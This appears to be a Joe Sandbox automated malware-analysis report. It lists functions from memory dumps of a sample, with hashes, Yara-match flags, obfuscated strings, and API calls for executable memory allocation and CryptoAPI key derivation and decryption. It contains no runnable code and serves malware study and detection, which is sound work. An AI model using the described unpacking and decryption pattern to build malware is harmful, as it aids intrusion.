Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f178b4254448be43135aacd359bba3f7d6345168eee3ed400b7131dfad065a5
Instruction ID: 9534e4d88c403d6e47586c5d27ec3a69bae0808de66e3450b4e4dcc8270f7daf
Opcode Fuzzy Hash: 7f178b4254448be43135aacd359bba3f7d6345168eee3ed400b7131dfad065a5
Instruction Fuzzy Hash: D5216DEB2481217EB103C1426F64EFB676EE1C5730731892AF887D1906F395AE4E6931

Function 04D60C92 Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 46146c00d1c503c7a28901f1aecc07cb9721add135cdf73a8c37eefd711224d8
Instruction ID: e7ffcf400cdf6b93be9798ff61fe91df907e6041cd918f84d8e25a856d50e085
Opcode Fuzzy Hash: 46146c00d1c503c7a28901f1aecc07cb9721add135cdf73a8c37eefd711224d8
Instruction Fuzzy Hash: D22171EB2081117EB103C1426B24EFB676DD2C5730730892BF847D1902F395AE4E6531

Function 04D60D00 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 28c87d7f3d22e0a46a525b2b9a662e35b6f682668f3a25b9a5006db89964c36b
Instruction ID: b516a4e98da29dc348753d428dfb68824d4b1fc801f58ba02e53dcce11b75497
Opcode Fuzzy Hash: 28c87d7f3d22e0a46a525b2b9a662e35b6f682668f3a25b9a5006db89964c36b
Instruction Fuzzy Hash: FA1184EB348150BFA503C1516A149FA6B6EE5C67303344976F987D5903F294AA0E7531

Function 04D60D23 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 728040908dc6bbe3d9e25dfd8e9aa1206b36ee5bcb4a7cd0fcfca9c082fee2ce
Instruction ID: 5f57ec693bb1bbb5a1cea9f45a2aa370c1742a03667a6d4f6b5012e378818023
Opcode Fuzzy Hash: 728040908dc6bbe3d9e25dfd8e9aa1206b36ee5bcb4a7cd0fcfca9c082fee2ce
Instruction Fuzzy Hash: 6F11E7FB348211BFA203C19156549FB676ED6C13303304826F543D1902F794BD497931

Function 04D60D66 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: a3142dc027eb21e127c0ca3d4f917000e8718fbb90d0c2c2819c2c014ae76c8b
Instruction ID: 6c2a76a8328ce6abcd0eed29123c2c13dabcc7457de5bb9a671a7c92b9e449f3
Opcode Fuzzy Hash: a3142dc027eb21e127c0ca3d4f917000e8718fbb90d0c2c2819c2c014ae76c8b
Instruction Fuzzy Hash: D00128E7248260BFE103C1514A146FA6B6EE6C73307304936B587E3A03F794BE497931

Function 04D60D53 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 33643d5ed5882a6690214487314f4ef03011a5cbf241267e07169bb9b00d3480
Instruction ID: 6736a497576ae22bae03f619e4697362715bda886e837663e45db2d8c688ac69
Opcode Fuzzy Hash: 33643d5ed5882a6690214487314f4ef03011a5cbf241267e07169bb9b00d3480
Instruction Fuzzy Hash: 76012BDB348220BFD203C55146549FA6A7EE6C63307304921B983D2A03F7D4BE097D31

Function 04D60DE8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: fc6f75890c820139721d90fb9b02874ba3b906013291a5868cc74c18737140b3
Instruction ID: 4e19b4835dcbb6c5be9be4b53e2775012c02fbebee7c02252e4978944a924331
Opcode Fuzzy Hash: fc6f75890c820139721d90fb9b02874ba3b906013291a5868cc74c18737140b3
Instruction Fuzzy Hash: B70149D76882607F9243C1950B14AFB6A2FA6C66303344962B983E7A43F7C5AE0E7431

Function 04D60D8A Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 757865eccd5b6d45ea25ba6f33f5561abf56ed1c852afecf2bc3d749ee8b160b
Instruction ID: 35bc57ae345672ab21efd70c829f79ea2f8bdd87d0f87499df0e0359b97d038f
Opcode Fuzzy Hash: 757865eccd5b6d45ea25ba6f33f5561abf56ed1c852afecf2bc3d749ee8b160b
Instruction Fuzzy Hash: 24F028E76842217F9243C1951B14AFA6A6F96C66707304922B943E7A03F7C4AE093431

Function 04D60D4D Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 59bc1af7086c0899f9ec32401c35f5f9576faddce4b2d9150fc13f5827720de0
Instruction ID: 9d50212be9b94659e4e0031b7921470e664736f3a48143290a94450d886c731c
Opcode Fuzzy Hash: 59bc1af7086c0899f9ec32401c35f5f9576faddce4b2d9150fc13f5827720de0
Instruction Fuzzy Hash: 54F0BBDB344220BFA543C1515B54AFB6A6FD6C66307304961B987E2A03F7D4BE0D7831

Function 04D60DA3 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: cd0409af77e5f06897da61bab825885dc1c1da640eb5ea38743bbd825d5931db
Instruction ID: 2563925dc6672173cb75a9025fe3b729d9818417c99c69f702ded9169944bc23
Opcode Fuzzy Hash: cd0409af77e5f06897da61bab825885dc1c1da640eb5ea38743bbd825d5931db
Instruction Fuzzy Hash: 8EF0F6DB244120BFA543C1514B585FA2A2EE6C66303304861B547E3A03F794FE097831

Function 04D60DB6 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 11217b172826aa549d7892a621cc75d29126fd40a68ac81cd4e39b54a5375bcc
Instruction ID: aef1f8135c39bc8b20cb0f78362821e76c70d51855f695f617417a6e2995776e
Opcode Fuzzy Hash: 11217b172826aa549d7892a621cc75d29126fd40a68ac81cd4e39b54a5375bcc
Instruction Fuzzy Hash: 72F0E9E7244220AFD503C1625B486FA672ED6C53307304821F547D7603F7D8AF097931

Function 0041249E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD

Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2

Function 0040E268 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0040E27B

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680

Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 10005C07

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691

Function 00F4AE95 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00F4AEE6

Memory Dump Source

Source File: 00000000.00000002.3029432570.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b38876be36cda878f2b6a24499a28fe3c3293d087504e4a61bfbf9aee02c346d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A2113C79A40208EFDB01DF98C985E98BFF5AF08350F058094F9489B362D375EA50EF80

Function 00402BF0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9

Function 00402C10 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84

Non-executed Functions

Function 04B43B27 Relevance: 31.4, APIs: 9, Strings: 8, Instructions: 1645COMMON

Download Yara Rule

Strings

rB, xrefs: 04B442AC
FOKD, xrefs: 04B4431F
rB, xrefs: 04B46527
rB, xrefs: 04B43DD6
DFEK, xrefs: 04B45143
rB, xrefs: 04B450DE
]DFE, xrefs: 04B444F4
rB, xrefs: 04B44DB5

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
API String ID: 0-735762442
Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
Instruction ID: f9dcea7f7b74f7a7a3300ace79cc6978366e73db8824ea66bee9f315b22b43fa
Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
Instruction Fuzzy Hash: EAE2C2B0D002589BEB24EF68CC54BEDBB74EF91308F1041D8D5496B281DB757A88EFA5

Function 04B43727 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 04B437A7
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B437CB
_mbstowcs.LIBCMT ref: 04B4381E
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B43835
GetLastError.KERNEL32 ref: 04B4383F
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B43867
GetLastError.KERNEL32 ref: 04B43871
CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B43881
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B43943
CryptDestroyKey.ADVAPI32(?), ref: 04B439B5

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B43783

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3642901890-63410773
Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
Instruction ID: 4fe274e54d431eebfbc365bd5b69b411441be6651f31eb9a9068311ca2197b44
Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
Instruction Fuzzy Hash: F6818471B00218AFEF209F24CC45B9ABBB5FF89300F0481E5E94DE7290DB319A849F55

Function 00987939 Relevance: 11.6, Strings: 8, Instructions: 1585COMMON

Download Yara Rule

Strings

CQ.j, xrefs: 00988B5A
z4E~, xrefs: 0098860C
`k\, xrefs: 00988BD4
Q?^, xrefs: 00987BC3
4c{, xrefs: 00988C19
4c{, xrefs: 00988C09
z4E~, xrefs: 009885F1
*~, xrefs: 009879E9

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: *~$4c{$4c{$CQ.j$Q?^$`k\$z4E~$z4E~
API String ID: 0-1874172320
Opcode ID: 6a66fbae230fc52f6b87c38c0ddb0228d8193241efd890810a69470cd24e792d
Instruction ID: d08576805ee7822e6622c87198cd8f5b9bc78cf27b09b61f735eab5d30e558fc
Opcode Fuzzy Hash: 6a66fbae230fc52f6b87c38c0ddb0228d8193241efd890810a69470cd24e792d
Instruction Fuzzy Hash: F1B207F3A0C2109FE3046E2DEC8567AB7E9EF94320F1A493DE6C5C3744EA3598058697

Function 00990031 Relevance: 10.4, Strings: 7, Instructions: 1612COMMON

Download Yara Rule

Strings

)qNi, xrefs: 00990F04
/[, xrefs: 00990D34
|4, xrefs: 00990B3E
f$~=, xrefs: 00990F77
b#~, xrefs: 0099110E
:{7, xrefs: 009901D0
M%vt, xrefs: 0099095B

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: )qNi$:{7$M%vt$b#~$f$~=$|4$/[
API String ID: 0-2982745220
Opcode ID: fd7c3e3ec0e9357dbe1715d2be12a42c1dab71b79361b94124bb771eca7d9f67
Instruction ID: 10c7264711816356a195473e491d6a19d6bcf7c43b54389fda646216c008ad99
Opcode Fuzzy Hash: fd7c3e3ec0e9357dbe1715d2be12a42c1dab71b79361b94124bb771eca7d9f67
Instruction Fuzzy Hash: 81B228F3A0C2149FE304AE2DEC8567ABBE9EF94320F16493DEAC4C7344E67558058697

Function 0098B029 Relevance: 10.4, Strings: 7, Instructions: 1608COMMON

Download Yara Rule

Strings

^N[T, xrefs: 0098B4DE
3~?_, xrefs: 0098B110
Tx~, xrefs: 0098BA7A
a+z, xrefs: 0098B99C
;2-G, xrefs: 0098B6AB
q0/W, xrefs: 0098BCE3
/&u}, xrefs: 0098B16C

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: /&u}$3~?_$;2-G$Tx~$^N[T$a+z$q0/W
API String ID: 0-305514847
Opcode ID: 69f625eca0483f3d9b851cc7e50609c10e1cfb315a4ea989726a74410a0b1cf1
Instruction ID: 9b53d7cf42faa6613f8c5265db3ae424c525dc9873927c5ee351288604f0ce01
Opcode Fuzzy Hash: 69f625eca0483f3d9b851cc7e50609c10e1cfb315a4ea989726a74410a0b1cf1
Instruction Fuzzy Hash: DFB2F6F360C2009FE304AE6DEC8567AFBE9EF94720F16893DE6C4C7744EA3558018696

Function 004188AA Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1451COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00418A25

Strings

1#INF, xrefs: 00419BE0
1#IND, xrefs: 00419BB5
1#SNAN, xrefs: 00419BBC
1#QNAN, xrefs: 00419BC3

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
Instruction ID: d7ffb76180c9728a397d1ccf0e686cee7d0516322be8d88619d78ced8c4d9a03
Opcode Fuzzy Hash: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
Instruction Fuzzy Hash: F1C22A72E042288FDB25CE28DD507EAB3B5EB49314F1441ABD84DE7280E779AEC58F45

Function 00980F04 Relevance: 7.9, Strings: 5, Instructions: 1617COMMON

Download Yara Rule

Strings

.>>, xrefs: 009818B7
?Ws, xrefs: 00981CDD
&|, xrefs: 00981546
~So, xrefs: 00981A1C
P:c|, xrefs: 00980FCB

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: &|$?Ws$P:c|$~So$.>>
API String ID: 0-4162764347
Opcode ID: 76dab9fe780003f293f90c224ab979a0c631abb7c82db090293c9c561f4d4155
Instruction ID: 3f1f4171b4034e2e3b92fc56db1563a04b62e3b1e37c9b75a03ff5f303689f3e
Opcode Fuzzy Hash: 76dab9fe780003f293f90c224ab979a0c631abb7c82db090293c9c561f4d4155
Instruction Fuzzy Hash: 17B205F360C2009FE304AE29EC8567AF7E9EF94720F1A893DE6C5C7744E63598418697

Function 00982A98 Relevance: 7.8, Strings: 5, Instructions: 1593COMMON

Download Yara Rule

Strings

MjG, xrefs: 00982B47
!1o, xrefs: 00983627
kzo, xrefs: 00982DA7
hqw, xrefs: 00983422
*h5g, xrefs: 009835F4

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: !1o$*h5g$MjG$hqw$kzo
API String ID: 0-1730995256
Opcode ID: e57e922ce3ae464332a173a02d25bd203691bf2848fb30caf75e06c20d905534
Instruction ID: 0ca85a4497bb161e6b80c52d758fdc3d986a55f50d0ed48e279de8e8102f3528
Opcode Fuzzy Hash: e57e922ce3ae464332a173a02d25bd203691bf2848fb30caf75e06c20d905534
Instruction Fuzzy Hash: 4FB2E6F360C6049FD304AE2DEC8577ABBEAEF94720F16893DE6C4C3744E63598058696

Function 0097F9BA Relevance: 7.5, Strings: 5, Instructions: 1201COMMON

Download Yara Rule

Strings

R8u3, xrefs: 0097FD94
"f}_, xrefs: 009805C8
n+, xrefs: 0097FDD2
>, xrefs: 00980398
%YW], xrefs: 0097FC8E

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: n+$"f}_$%YW]$R8u3$>
API String ID: 0-3395714735
Opcode ID: 3801660746733b853fb0c22074432601d9526164ea6e243b56887a061e831174
Instruction ID: 42ba58d161ba8f61a23558fb18971b920bca90abd3bcc4dfe3d4309c9a5cac20
Opcode Fuzzy Hash: 3801660746733b853fb0c22074432601d9526164ea6e243b56887a061e831174
Instruction Fuzzy Hash: 3782D3F350C204AFE304AE29EC8567AFBE9EF94720F164A2DE6C4C7744EA3558418797

Function 0098E59D Relevance: 6.6, Strings: 4, Instructions: 1638COMMON

Download Yara Rule

Strings

AcW, xrefs: 0098EED9
<~u, xrefs: 0098EB64
\?, xrefs: 0098EB6D
~=f, xrefs: 0098EC1B

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: AcW$~=f$<~u$\?
API String ID: 0-3575736910
Opcode ID: 9c5a75e2e0fe3f7da3839f80241fa6b61847a744e24921971bbe3b8ae6b52ff2
Instruction ID: fb8c425e43c748faabc551c9c68eff38a37c06b14d9100d8bc5b4b7e5c9ebce6
Opcode Fuzzy Hash: 9c5a75e2e0fe3f7da3839f80241fa6b61847a744e24921971bbe3b8ae6b52ff2
Instruction Fuzzy Hash: 4BB209F360C2009FE7086F2DEC8567ABBE5EF94720F16893DE6C5C7744EA3598018656

Function 0097D94E Relevance: 6.6, Strings: 4, Instructions: 1553COMMON

Download Yara Rule

Strings

K`'O, xrefs: 0097E121
